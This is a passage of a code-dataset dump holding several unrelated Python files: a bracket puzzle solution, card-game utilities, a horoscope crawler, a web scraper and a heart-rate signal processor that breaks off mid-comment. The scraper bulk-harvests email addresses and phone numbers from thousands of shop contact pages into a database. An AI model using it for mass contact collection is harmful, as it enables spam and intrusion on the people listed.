convert_stack.append(3)\n else:\n return 0\n\n prev = bracket\n\n if len(bracket_stack) != 0:\n return 0\n\n calc_result = calc_process(convert_stack)\n\n if calc_result:\n total += calc_result\n else:\n return 0\n\n return total\n\n\nbrackets = list(input())\n\nprint(bracket_process(brackets))\n","sub_path":"PYTHON/BAEKJOON/2504_괄호의_값/2504.py","file_name":"2504.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380424404","text":"import os\nimport json\nimport numpy as np\nfrom collections import OrderedDict\n\nimport rlcard\n\nfrom rlcard.games.karma.card import KarmaCard as Card\n\n# Read required docs\nROOT_PATH = rlcard.__path__[0]\n\n# a map of abstract action to its index and a list of abstract action\nwith open(os.path.join(ROOT_PATH, 'games/karma/jsondata/action_space.json'), 'r') as file:\n ACTION_SPACE = json.load(file, object_pairs_hook=OrderedDict)\n ACTION_LIST = list(ACTION_SPACE.keys())\n\n# a map of color to its index\n# COLOR_MAP = {'d': 0, 'h': 1, 's': 2, 'c': 3} #diamonds,hearts,spades,clubs\n\nCOUNT_MAP = {'1': 0, '2': 1, '3': 2} # one, two or three cards of a trait\n\n# a map of trait to its index\nTRAIT_MAP = {'4': 0, '5': 1, '6': 2, '7': 3, '8': 4, '9': 5, 'J': 6, 'Q': 7,\n 'K': 8, 'A': 9, '2': 10, '3': 11, '10': 12}\n\nWILD = ['2', '3', '10']\n\n\n# WILD_DRAW_4 = ['r-wild_draw_4', 'g-wild_draw_4', 'b-wild_draw_4', 'y-wild_draw_4']\n\n\ndef init_deck():\n ''' Generate karma deck of 52 cards\n '''\n deck = []\n card_info = Card.info\n for i in range(4):\n\n # init number cards\n for num in card_info['trait'][:10]:\n deck.append(Card('number', num))\n\n # init wild cards\n for action in card_info['trait'][10:13]:\n deck.append(Card('wild', action))\n\n return deck\n\n\ndef cards2list(cards):\n ''' Get the corresponding string representation of cards\n\n Args:\n cards (list): list of KarmaCards objects\n\n Returns:\n (string): string representation of cards\n '''\n cards_list = []\n for card in cards:\n cards_list.append(card.get_str())\n return cards_list\n\n\ndef get_cards_dict(cards):\n ''' Get the corresponding dict representation of cards\n\n Args:\n cards (list): list of string of cards\n\n Returns:\n (dict): dict of cards\n '''\n\n cards_dict = {}\n if cards:\n for card in cards:\n if card not in cards_dict:\n cards_dict[card] = 1\n else:\n cards_dict[card] += 1\n return cards_dict\n\n\ndef encode_cards(plane, hand):\n ''' Encode hand and represerve it into plane\n\n Args:\n plane (array): 4*13 numpy array\n hand (list): list of string of hand's card\n\n Returns:\n (array): 4*13 numpy array\n '''\n\n # 1 card,2 cards ,3 cards, 4 cards\n\n hand_ = get_cards_dict(hand)\n for card, count in hand_.items():\n card_info = card\n trait = TRAIT_MAP[card_info]\n plane[count - 1][trait] = 1\n return plane\n\ndef encode_target(plane, target):\n ''' Encode target and represerve it into plane\n\n Args:\n plane (array): 1*4*15 numpy array\n target(str): string of target card\n\n Returns:\n (array): 1*4*15 numpy array\n '''\n if target != '':\n target_info = target\n trait = TRAIT_MAP[target_info]\n plane[0][trait] = 1\n return plane\n\n\n# def encode_target(plane, target):\n# ''' Encode target and represerve it into plane\n\n# Args:\n# plane (array): 4*13 numpy array\n# target(str): string of target card\n\n# Returns:\n# (array): 4*13 numpy array \n# '''\n\n# target = get_cards_dict(target)\n\n# for card, count in target.items():\n# card_info = card\n# # color = COLOR_MAP[card_info[0]]\n# trait = TRAIT_MAP[card_info]\n# plane[count - 1][trait] = 1\n# return plane\n","sub_path":"rlcard/games/karma/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"22358282","text":"import requests as rq\nfrom bs4 import BeautifulSoup\nimport time, json, argparse\n\n#要抓:星座名稱、幸運時間、幸運星座、財運指數\n#財運指數+財運部分的敘述\n\ndef crawl(link):\n response = rq.get(link)\n soup = BeautifulSoup(response.text, \"html.parser\")\n dic = {}\n dic_constellation = {\"10\":\"水瓶座\", \"11\":\"雙魚座\", \"0\":\"牡羊座\", \"1\":\"���牛座\", \"2\":\"雙子座\", \"3\":\"巨蟹座\",\"4\":\"獅子座\",\"5\":\"處女座\",\n \"6\":\"天秤座\",\"7\":\"天蠍座\",\"8\":\"射手座\",\"9\":\"摩羯座\"}\n \n #星座\n temp_index = link.find(\"Astro\")\n dic[\"constellation\"] = dic_constellation[link[temp_index+6]]\n \n #幸運時間\n dic[\"luc_time\"]=soup.find_all(\"h4\")[3].getText()\n \n #幸運星座\n dic[\"luc_constellation\"]=soup.find_all(\"h4\")[4].getText()\n \n #財運指數\n temp_index = str(soup.find_all(\"div\", class_=\"STAR_LIGHT\")[3]).find(\"icon\") #找icon這個字樣\n fortune_index = str(soup.find_all(\"div\", class_=\"STAR_LIGHT\")[3])[temp_index+5]\n dic[\"fortune_index\"] = fortune_index\n #財運部分描述\n fortune_descri = soup.find_all(\"span\", class_=\"txt_orange\")[0].parent.find_next_siblings(\"p\")[0].getText()\n dic[\"fortune_descri\"] = fortune_descri\n \n return dic\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-web', type=str, help='website address')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n output = crawl(args.web)\n #把title與document寫入\n print(output)\n jsObj = json.dumps(output, ensure_ascii=False)\n with open('./output.json', 'w') as f:\n f.write(jsObj)\n\n","sub_path":"crawl_constellation.py","file_name":"crawl_constellation.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"525140323","text":"# Webscraper searches through a Website by given url for specific data\n# For now its scrapping emails and phone-numbers\n# Configured for german sites\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n#self made mathod to handle functions taking too long\nfrom timeout import timeout\nfrom dbHandler import DbHandler\nimport re\n\nclass Webscraper:\n def __init__(self, url):\n # self.url = url\n # self.emails = [] # list\n # self.numbers = [] # list\n self.browser = webdriver.PhantomJS()\n self.browser.set_window_size(1024, 768)\n # self.browser.get(self.url)\n # self.content = ''\n self.initNewContent(url)\n\n ### GET METHODS HERE\n def getUrl(self):\n return self.url\n\n def getEmails(self):\n return self.emails\n\n def getNumbers(self):\n return self.numbers\n\n ### FORMAT & REMOVE NEEDLESS CONTENT ###\n def initNewContent(self, newUrl, leaveLists=0):\n if leaveLists == 0:\n self.numbers = []\n self.emails = []\n self.url = newUrl\n self.browser.get(self.url)\n soup = BeautifulSoup(self.browser.page_source)\n for script in soup([\"script\", \"style\"]):\n script.extract() # rip out script content\n self.content = soup.get_text()\n\n\n ### RUN ###\n def run(self):\n self.findNumbers()\n self.findEmails()\n self.findImpressum()\n self.findNumbers()\n self.findEmails()\n # self.printResult()\n\n ### PRINT RESULTS (EMAILS & NUMBERS) ###\n def printResult(self):\n if self.numbers:\n print(\", \".join(self.numbers))\n if self.emails:\n print(\", \".join(self.emails))\n\n ### FINDS EMAIL-ADRESSES ON A PAGE BY URL - ADDS TO A LIST ###\n def findEmails(self):\n EMAIL_REGEX = re.compile(\"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+)\")\n match = re.findall(EMAIL_REGEX, self.content)\n for m in match:\n m = ''.join(m)\n m = re.sub(\"(\\(@\\)|\\<@\\>|\\(at\\))\", \"@\", m)\n m = m.lower()\n m = re.sub(\"\\.de.+\", \".de\", m)\n m = re.sub(\"\\.ch.+\", \".ch\", m)\n m = re.sub(\"\\.eu.+\", \".eu\", m)\n m = re.sub(\"\\.at.+\", \".at\", m)\n m = re.sub(\"\\.com.+\", \".com\", m)\n m = re.sub(\"\\.org.+\", \".org\", m)\n if not m[-1].isalpha():\n m = m[:-1]\n if (m not in self.emails) and (m != ''):\n self.emails.append(m)\n\n ### FINDS PHONE NUMBERS ON A PAGE BY URL - ADDS TO A LIST ###\n def findNumbers(self):\n NUMBER_REGEX = \"(Tel|tel|TEL|Tele|tele|TELE|Telefon|telefon|TELEFON|Fon|FON|fon|line|Line|LINE|Phone|Call)\"\n NUMBER_REGEX += \"([:\\.\\-\\s]*)(\\<\\/[^\\>]+\\>)*\\s*(\\<[^\\>]+\\>)?\\s*([+\\(]?)([\\d\\s\\- –)(\\/]{7,})\"\n match = re.findall(NUMBER_REGEX, self.content)\n # print(NUMBER_REGEX)\n for m in match:\n m = ''.join(m)\n m = re.findall('\\d+', m)\n m = ''.join(m)\n if (m not in self.numbers) and (m != '') and (len(str(m)) > 6):\n self.numbers.append(m)\n\n ### DOES FIND THE IMPRESSUM/KONTAKT PAGE AND INITS THE CONTENT FROM THAT PAGE ###\n def findImpressum(self):\n possibleLinks = [\"Impressum\", \"IMPRESSUM\", \"impressum\",\n \"Kontakt\", \"kontakt\", \"KONTAKT\", \"Kontakt/Impressum\"]\n impTag = None\n for pl in possibleLinks:\n try:\n impTag = self.browser.find_element_by_partial_link_text(pl)\n break\n except:\n pass\n if impTag is not None:\n self.initNewContent(impTag.get_attribute(\"href\"), 1)\n\n\n\n\ndef main():\n\n ### 1st Modi - SCRAPPING SINGLE URL - NO DB - PRINT ONLY ###\n\n # myScrapper = Webscraper(\"http://www.gehoerschutz-versand.de\")\n # print(myScrapper.getUrl())\n # myScrapper.run()\n # myScrapper.printResult()\n # print(myScrapper.getUrl())\n\n\n\n\n ### 2nd Modi - WITHOUT TIMEOUT TRY-BLOCK - FOR BETTER DEBUGGING ###\n\n # filename = \"lists/listWithTitles.txt\"\n # list = open(filename, 'r')\n #\n # myDbHandler = DbHandler(\"db/online-shops.db\")\n # myDbHandler.create_all_tables()\n # i = 1\n # myScrapper = Webscraper(\"http://www.example.com\")\n # for line in list:\n # if line.startswith('--'):\n # category = line.replace(\"--\", \"\")\n # print(\"\\n\\n\" + category + \"\\n\\n\")\n # elif line.startswith('h'):\n # myScrapper.initNewContent(line)\n # link = myScrapper.getUrl()\n #\n # myScrapper.run()\n # impLink = myScrapper.getUrl()\n # myDbHandler.insertToLinkTable(i, category, link, impLink)\n # myDbHandler.InsertListToNumbersTable(i, myScrapper.getNumbers())\n # myDbHandler.InsertListToEmailsTable(i, myScrapper.getEmails())\n # numbers = \";\".join(myScrapper.getNumbers())\n # emails = \";\".join(myScrapper.getEmails())\n # print(link + \";\" + impLink + \";\" + numbers + \";\" + emails + \"\\n\")\n # i += 1\n # else:\n # pass\n\n\n\n ### 3rd Modi - FINAL - WRITE IN DB - MAKING SURE FOR NO ENDLES METHODS ###\n\n filename = \"lists/listPart4.txt\"\n list = open(filename, 'r')\n\n myDbHandler = DbHandler(\"db/online-shops.db\")\n myDbHandler.create_all_tables()\n i = 6705\n myScrapper = Webscraper(\"http://www.example.com\")\n category = \"produkt-und-preisvergleiche--\"\n for line in list:\n if line.startswith('--'):\n category = line.replace(\"--\", \"\")\n print(\"\\n\\n\" + category + \"\\n\\n\")\n elif line.startswith('h'):\n with timeout(seconds=80):\n try:\n myScrapper.initNewContent(line)\n link = myScrapper.getUrl()\n\n myScrapper.run()\n impLink = myScrapper.getUrl()\n myDbHandler.insertToLinkTable(i, category, link, impLink)\n myDbHandler.InsertListToNumbersTable(i, myScrapper.getNumbers())\n myDbHandler.InsertListToEmailsTable(i, myScrapper.getEmails())\n numbers = \";\".join(myScrapper.getNumbers())\n emails = \";\".join(myScrapper.getEmails())\n finalString = link + \";\" + impLink + \";\" + numbers + \";\" + emails\n finalString = finalString.replace(\"\\n\", \"\")\n # finalString += \"\\n\"\n print(finalString)\n i += 1\n except:\n myScrapper = Webscraper(\"http://www.example.com\")\n pass\n # print(\"ERROR -> \" + line)\n else:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"web-scrapper.py","file_name":"web-scrapper.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"372162088","text":"## MARS Group Reverse-Engineering\n## MS: Biotechnology- Bioinformatics Capstone Spring 2021\n## University of Maryland Global Campus\n## Authors: Alex Mancera, Stephen Panossian, Analia Treviño-Flitton\n## HRVY- Heart Rate Viewer in PYthon Version 1.0\n\nimport numpy as np\nfrom heartpy import smooth_signal\nfrom scipy.signal import butter, filtfilt, iirnotch, savgol_filter\n\n# --------------------- HeartPy Source Code Start --------------------------------------------------\n__all__ = ['filter_signal',\n 'smooth_signal',\n 'get_samplerate_datetime']\n\n\ndef butter_lowpass(cutoff, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\n\ndef butter_highpass(cutoff, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='high', analog=False)\n return b, a\n\n\ndef butter_bandpass(lowcut, highcut, sample_rate, order=2):\n nyq = 0.5 * sample_rate\n low = lowcut / nyq\n high = highcut / nyq\n b, a = butter(order, [low, high], btype='band')\n return b, a\n\n\ndef filter_signal(data, cutoff, sample_rate, order=2, filtertype='highpass',\n return_top=False): # changed 'lowpass' to 'highpass' for more accuracy\n if filtertype.lower() == 'lowpass':\n b, a = butter_lowpass(cutoff, sample_rate, order=order)\n elif filtertype.lower() == 'highpass':\n b, a = butter_highpass(cutoff, sample_rate, order=order)\n elif filtertype.lower() == 'bandpass':\n assert type(cutoff) == tuple or list or np.array, 'if bandpass filter is specified, \\\ncutoff needs to be array or tuple specifying lower and upper bound: [lower, upper].'\n b, a = butter_bandpass(cutoff[0], cutoff[1], sample_rate, order=order)\n elif filtertype.lower() == 'notch':\n b, a = iirnotch(cutoff, Q=0.005, fs=sample_rate)\n else:\n raise ValueError('filtertype: %s is unknown, available are: \\\nlowpass, highpass, bandpass, and notch' % filtertype)\n\n filtered_data = filtfilt(b, a, data)\n\n if return_top:\n return np.clip(filtered_data, a_min=0, a_max=None)\n else:\n return filtered_data\n\n\ndef remove_baseline_wander(data, sample_rate, cutoff=0.05):\n return filter_signal(data=data, cutoff=cutoff, sample_rate=sample_rate, filtertype='notch')\n\n\ndef smooth_signal(data, sample_rate, window_length=None, polyorder=3):\n if window_length == None:\n window_length = sample_rate // 10\n\n if window_length % 2 == 0 or window_length == 0: window_length += 1\n\n smoothed = savgol_filter(data, window_length=window_length,\n polyorder=polyorder)\n return smoothed\n\n\ndef get_samplerate_datetime(datetimedata, timeformat='%H:%M:%S.%f'):\n from datetime import datetime\n datetimedata = np.asarray(datetimedata, dtype='str') # cast as str in case of np.bytes type\n elapsed = ((datetime.strptime(datetimedata[-1], timeformat) -\n datetime.strptime(datetimedata[0], timeformat)).total_seconds())\n sample_rate = (len(datetimedata) / elapsed)\n return sample_rate\n\n\ndef scale_data(data, lower=0, upper=1024):\n rng = np.max(data) - np.min(data)\n minimum = np.min(data)\n data = (upper - lower) * ((data - minimum) / rng) + lower\n return data\n\n\ndef enhance_peaks(hrdata, iterations=2):\n scale_data(hrdata)\n for i in range(iterations):\n hrdata = np.power(hrdata, 2)\n hrdata = scale_data(hrdata)\n return hrdata\n\n\ndef flip_signal(data, enhancepeaks=False, keep_range=True):\n data_mean = np.mean(data)\n data_min = np.min(data)\n data_max = np.max(data)\n\n # invert signal\n data = (data_mean - data) + data_mean\n\n if keep_range:\n # scale data so original range is maintained\n data = scale_data(data, lower=data_min, upper=data_max)\n if enhancepeaks:\n data = enhance_peaks(data)\n return data\n\n\n# --------------------- HeartPy Source Code End ---------------------------------------------------\n\n\n''' HRVY- Heart Rate Viewer in PYthon Version 1.0 '''\n\n\n## Opens files & returns them as lists\ndef file_opener(dataset):\n import os\n contents = 'end'\n cur_dir = os.listdir(os.getcwd())\n hdr_found = False\n\n ## Check files in cwd for approved file types\n for file in cur_dir:\n ## Look for csv first\n if file.startswith(dataset) and file.endswith('.csv'):\n ## Checks for matching hdr file\n for second_file in cur_dir:\n if second_file.startswith(dataset) and second_file.endswith('.hdr'):\n try:\n with open(dataset + '.hdr', 'r') as h:\n hdr = h.readlines()\n with open(dataset + '.csv', 'r') as v:\n csv = v.readlines()\n print('Both csv and hdr files found')\n contents = (hdr, csv)\n hdr_found = True\n break\n except FileNotFoundError:\n print('Not a matching csv and hdr file')\n\n ## If hdr wasn't found, check csv for hdr data\n if hdr_found != True:\n try:\n contents = cat_file_parser(dataset + '.csv')\n break\n except FileNotFoundError:\n print('Not a csv file nested with hdr data')\n break\n\n ## If not one of the above, check for cat file\n elif file.startswith(dataset) and file.endswith('.cat'):\n try:\n print(\"The cat file has been found in the directory\")\n contents = cat_file_parser(dataset + '.cat')\n except FileNotFoundError:\n print('Not a cat file')\n break\n\n ## If no file found\n if contents == 'end':\n print(\n 'Cannot locate a viable file, please make sure data set name, the file type, and the directory are correct')\n\n return contents\n\n\n \n## Splits concatenated files & returns them as lists to main\ndef cat_file_parser(cat_file):\n del_num = 0\n hdr = []\n\n with open(cat_file, 'r') as f:\n intro = f.readlines()\n\n ## Split the hdr contents into own list\n for i in range(len(intro)):\n if intro[i].startswith('{id:'):\n hdr.append(intro[i])\n del_num += 1\n\n\n ## If no hdr file contents found\n elif not intro[i].startswith('{id:') and del_num == 0:\n print('This is not a concatenated file, no hdr data found')\n contents = \"end\"\n return contents\n\n ## If it is a cat file, hdr contents will be deleted from csv list\n if del_num != 0:\n print('Concatenated data found')\n for j in range(0, del_num):\n del intro[0]\n\n ## Pack lists into tuples & return\n contents_tup = (hdr, intro)\n\n return contents_tup\n\n\n \n## Parses hdr data and saves in a nested dictionary\ndef hdr_data(hdr):\n hdr_dat = {}\n node = 1\n nodes_not_2ms = {}\n\n ## Node information is formatted\n for line in hdr:\n l_split = line.strip('{').strip('\\n').strip('}').split(', ')\n\n ## Creates new nested dictionary with each line read in .hdr file\n hdr_dat[node] = {}\n for item in l_split:\n hdr_dat[node][item.split()[0].strip(':')] = item.split()[1]\n if item.split()[0].strip(':') == 'period' and item.split()[1] != '2ms':\n nodes_not_2ms[int(item.split()[1].strip('ms'))] = node\n node += 1\n\n ## Packed into tuple and returned\n hdr_info = (hdr_dat, nodes_not_2ms)\n\n return hdr_info\n\n\n \n## Determines if csv is pre-aligned\ndef align_plus_dat(hdr_dat, csv):\n aligned = ''\n\n ## Number of lines in .hdr file\n num_nodes = len(hdr_dat)\n\n ## Number of columns at the beginning of .csv file\n num_cols_start = len((csv[0]).split(','))\n\n ## Missing number of columns at the beginning of .csv file\n num_cols_mis = num_nodes + 1 - num_cols_start\n\n ## If no columns are missing\n if num_cols_mis == 0:\n print('No missing columns found, csv file pre-aligned')\n aligned = 'yes'\n else:\n print('Missing columns found, csv file not pre-aligned')\n aligned = 'no'\n\n ## Create new dictionary with the time for keys\n file_dat = {}\n file_dat['Time'] = []\n for key in hdr_dat:\n if hdr_dat[key]['label'] in file_dat:\n file_dat[hdr_dat[key]['label'] + '(2)'] = []\n else:\n file_dat[hdr_dat[key]['label']] = []\n hdr_dat.clear()\n\n ## Pack into tuples & return\n align_contents = (num_nodes, num_cols_start, num_cols_mis, aligned)\n dat_plus_align = (align_contents, file_dat)\n\n return dat_plus_align\n\n \n\n## Checks for time gaps & fills is missing\ndef time_out(csv, file_dat, nodes_not_2ms, align_cont):\n import datetime as dt\n\n ## Unpack tuple from align_plus_dat\n (num_nodes, num_cols_start, num_cols_mis, aligned) = align_cont\n\n ## Set time object\n last_line_time = ''\n two_ms = dt.timedelta(milliseconds=2)\n\n for line in csv:\n ## If there is a timestamp, current time is kept as provided\n if not line.startswith(','):\n curr_line_time = dt.datetime.strptime(line.split(', ')[0], '%Y-%m-%d %H:%M:%S.%f %z')\n\n ## Checks for time gap\n if last_line_time != '' and curr_line_time != last_line_time + two_ms:\n time_dif = (curr_line_time - last_line_time).total_seconds()\n if time_dif < 180:\n print(' >', time_dif, 'second gap starting at', last_line_time)\n\n ## If time gap is over a minute long\n else:\n print(' >', round(time_dif / 60, 3), 'minute gap starting at', last_line_time)\n while curr_line_time != file_dat['Time'][-1] + two_ms:\n file_dat['Time'].append(file_dat['Time'][-1] + two_ms)\n for key, items in file_dat.items():\n if key != 'Time':\n items.append(0.5)\n if curr_line_time - two_ms <= file_dat['Time'][-1]:\n break\n print(' Gap filled')\n ## Saves current time for reference on next line\n last_line_time = curr_line_time\n\n ## If timestamp not already given adds 2ms to saved reference time\n else:\n last_line_time += two_ms\n file_dat['Time'].append(last_line_time)\n\n ## Records values from csv and fills in blank columns/values with recorded values\n ## Fills in blanks with recorded values or 0.5 (baseline) where data was not recorded\n for n in range(1, num_cols_start):\n file_dat[list(file_dat)[n]].append(float(line.split(', ')[n].strip() or 0.5))\n\n ## If empty columns exist blanks are filled with 0.5 where columns are empty\n if aligned == 'no':\n for n in range(num_cols_mis):\n if len(line.split(', ')) < num_nodes + 1:\n file_dat[list(file_dat)[num_cols_start + n]].append(\n 0.5)\n ## Fills in blanks with recorded values or 0.5 where data was not recorded\n else:\n file_dat[list(file_dat)[num_cols_start + n]].append(float((line.split(', ')[\n num_cols_start + n].strip() or 0.5)))\n ## If there are any non-2ms nodes, derive values for 2ms interval\n if len(nodes_not_2ms) > 0:\n for interval, node in nodes_not_2ms.items():\n node_list = file_dat[list(file_dat)[node]]\n min_start = (interval // 2) + 1\n empty_vals = node_list[-(interval // 2):-1]\n if len(node_list) > min_start and set(empty_vals) == {0.5} and node_list[-1] != 0.5:\n mis_val_int = (node_list[-min_start] - node_list[-1]) / (len(empty_vals) + 1)\n mult = 1\n for n in range(len(empty_vals)):\n node_list[-2 - n] = node_list[-1] + (mult * mis_val_int)\n mult += 1\n\n print('Done pulling data')\n return file_dat\n\n\n \n## Data processing, printing, and plotting options\ndef plot_out(final_dat, dataset):\n import plotly\n import plotly.express as px\n\n ## Create data set folder in cwd\n new_folder()\n\n ## Present user with options\n print('\\nWhich set of data would you like to use?')\n print(' 1) Original, unaltered data')\n print(' 2) Data with baseline correction, noise reduction,')\n print(' and flat/steep peak reduction')\n\n ## If baseline corrections etc selected, corrected_dict is called\n while True:\n op1 = int(input('Choice: '))\n if op1 in (1, 2):\n break\n print('Invalid selection')\n print()\n if op1 == 1:\n data_pref = final_dat\n title = 'Unaltered'\n if op1 == 2:\n corrected = corrected_dict(final_dat)\n data_pref = corrected\n final_dat.clear()\n title = 'Corrected'\n\n print('\\nWould you like to print ' + title.lower() + ' data?')\n while True:\n op2 = input('Y/N: ').upper()\n if op2 in ('Y', 'N'):\n break\n print('Invalid selection')\n\n ## If saving locally for printing, print_dict is called\n if op2 == 'Y':\n with open(dataset + '_concat_' + title.lower() + '.csv', 'w') as out:\n print_dict(data_pref, out)\n print('\\nData has been printed to the data set folder')\n\n ## Plotting data begins\n print('\\nPlotting points')\n for key, items in data_pref.items():\n if key != 'Time':\n fig = px.line(x=data_pref['Time'][0::4],\n y=data_pref[key][0::4],\n labels={'x': '', 'y': key})\n items = tuple()\n fig.update_layout(title_text=title + ' data from ' + dataset + ', node ' + key, showlegend=False)\n\n ## Offline plot file named here\n plotly.offline.plot(fig, filename=dataset + '_' + key + '_' + title.lower() + '.html')\n print('node', key, 'chart printed')\n\n data_pref.clear()\n\n \n\n## Creates data set folder in the current directory\ndef new_folder():\n import os\n\n ## Get path for cwd\n path = os.path.join(os.getcwd(), dataset)\n\n ## Make new folder named after data set\n try:\n os.makedirs(path, exist_ok=True)\n print('Data set folder created successfully')\n os.chdir(path)\n except OSError:\n print('Data set folder cannot be created')\n\n \n\n## Data corrections occur here\ndef corrected_dict(dictionary):\n corrected = {}\n\n ## Calls HeartPy functions to remove baseline & HRVY peak reductions & inversion\n for key, items in dictionary.items():\n if key == 'Time':\n corrected['Time'] = tuple(dictionary['Time'])\n else:\n sample_rate = round(get_samplerate_datetime(dictionary['Time'], timeformat='%Y-%m-%d %H:%M:%S.%f%z'), 3)\n corrected[key] = tuple(smooth_signal(\n tall_peak_reduct(\n remove_baseline_wander(\n flat_peak_reduct(\n dictionary[key]\n ) # for flat_peak_reduct\n , sample_rate) # for remove_baseline_wander\n ) # for tall_peak_reduct\n , sample_rate, window_length=16, polyorder=3) # for smooth_signal\n )\n print('node', key, 'corrected')\n return corrected\n\n\n \n## Reduces long flat peaks\ndef flat_peak_reduct(lst):\n rep_val = None\n\n steep_slope = 0.5\n not_flat = 0.05\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n scale_max = 3\n ss_1 = 0\n\n for i, v in enumerate(lst):\n\n ## If segement of repeated values over 20ms is found, reduce to baseline 0.5\n if i > 0 and rep_val is None and v != 0.5 and v == lst[i - 1]:\n rep_val = v\n rv_start = i - 1\n if rep_val is not None and v != rep_val:\n rv_end = i\n len_rep_val = rv_end - rv_start\n if len_rep_val >= 10 and ss_check1 == 'N':\n lst[rv_start:rv_end] = [0.5] * len_rep_val\n rep_val = None\n\n ## If unrealistic tall peaks or steep slopes found, reduce\n if i > 0:\n slope = v - lst[i - 1]\n if i_start == None and abs(slope) >= not_flat:\n i_start = i - 1\n v_start = lst[i - 1]\n if abs(slope) >= steep_slope:\n ss_check1 = 'Y'\n ss_1 = slope\n if i_start == None:\n i_start = i - 1\n v_start = lst[i - 1]\n if slope != 0 and ss_1 != 0 and ss_check1 == 'Y' and abs(slope) >= not_flat and int(\n slope / abs(slope)) == int(ss_1 / abs(ss_1) * (-1)):\n ss_check2 = 'Y'\n\n ## If not a steep slope, reset values for next iteration\n if i_start != None and ss_check1 == 'N' and i - i_start >= 50:\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n\n ## If it is a steep slope, reduce segment\n if i_start != None and ss_check2 == 'Y' and slope != 0 and abs(slope) <= not_flat and rep_val == None:\n if i_start == 0:\n v_start = v\n i_end = i\n v_end = v\n len_ss = i_end - i_start\n fill = []\n v_dif = v_end - v_start\n step = v_dif / len_ss\n val = v_start\n vals = lst[i_start:i_end]\n most_dif_val = max(map(lambda x: abs(x - v_start), vals))\n if most_dif_val >= scale_max:\n for gap in range(len_ss):\n fill.append(val)\n val += step\n lst[i_start:i_end] = fill\n\n ## Clears values for next iteration\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n ss_1 = 0\n\n return lst\n\n\n \n## Removes unrealistic point and checks for data inversion\ndef tall_peak_reduct(lst):\n steep_slope = 0.3\n not_flat = 0.01\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n scale_max = 2\n ss_1 = 0\n\n ## Placeholder for the starting index of sample selection\n samp_start = None\n ## Placeholder for the ending index of sample selection\n samp_end = None\n ## List of guesses for each selection, whether selection is thought to be inverted, normal, or unknown\n inv_guesses = []\n\n for i, v in enumerate(lst):\n ## Start of the segment index & value taken,if unrealistic tall peaks created in flat_peak_reduct, reduce\n if i > 0:\n slope = v - lst[i - 1]\n if i_start == None and abs(slope) >= not_flat:\n i_start = i - 1\n v_start = lst[i - 1]\n if abs(slope) >= steep_slope:\n ss_check1 = 'Y'\n ss_1 = slope\n if i_start == None:\n i_start = i - 1\n v_start = lst[i - 1]\n if slope != 0 and ss_1 != 0 and ss_check1 == 'Y' and abs(slope) >= not_flat and int(\n slope / abs(slope)) == int(ss_1 / abs(ss_1) * (-1)):\n ss_check2 = 'Y'\n\n ## If not a steep slope, reset values for next iteration\n if i_start != None and ss_check1 == 'N' and i - i_start >= 50:\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n\n ## If it is a steep slope, reduce segment\n if i_start != None and ss_check2 == 'Y' and abs(slope) <= not_flat:\n i_end = i\n v_end = v\n len_ss = i_end - i_start\n vals = lst[i_start:i_end]\n fill = []\n v_dif = v_end - v_start\n step = v_dif / len_ss\n val = v_start\n most_dif_val = max(map(lambda x: abs(x - v_start), vals))\n if most_dif_val >= scale_max:\n for gap in range(len_ss):\n fill.append(val)\n val += step\n lst[i_start:i_end] = fill\n\n i_start = None\n v_start = None\n i_end = None\n v_end = None\n ss_check1 = 'N'\n ss_check2 = 'N'\n ss_1 = 0\n\n ##Detection of inverted signal by taking samples (1000 datapoints) of normal sections of data\n ## After slope is not flat, index & value taken for start of the sample selection\n if samp_start == None and slope <= not_flat:\n samp_start = i - 1\n ss_v = v\n\n ## If sample selection has started and either a steep slope or tall peak is detected, restart selection\n if samp_start != None and (slope >= steep_slope or abs(\n v - ss_v) > scale_max):\n samp_start = None\n\n ## Once clean selection of 1000 data points is found, take last index of sample selection\n ## Create a list of values from start to end of sample\n if samp_start != None and i - samp_start == 1000:\n samp_end = i\n samp_vals = lst[samp_start:samp_end]\n\n ## Max, min, & midpoint values of sample\n max_sv = max(samp_vals)\n min_sv = min(samp_vals)\n mid_sv = (max_sv + min_sv) / 2\n\n ## Find the percentage of values within the sample that fit the top & bottom half of the range\n top = sum(1 for x in samp_vals if mid_sv <= x <= max_sv) / len(\n samp_vals) * 100\n bottom = sum(1 for x in samp_vals if min_sv <= x <= mid_sv) / len(\n samp_vals) * 100\n\n ## If 75% or more of the data points are in the top half of the sample range, label guess- 'inverted'\n ## If data points are in bottom half of the range, label guess- 'normal'\n ## Everything else is labeled- 'unknown', then restart sample selection\n if top >= 75:\n inv_guesses.append('inv')\n elif bottom >= 75:\n inv_guesses.append('norm')\n else:\n inv_guesses.append('unk')\n samp_start = None\n\n ## For the list of guesses, find highest occurrence & probability\n if len(inv_guesses) > 0:\n guess = max(inv_guesses, key=inv_guesses.count)\n guess_perc = round(inv_guesses.count(guess) / len(inv_guesses) * 100, 2)\n\n ## If best guess is 'inverted' and probability is higher than 60%, call negdata_flip to 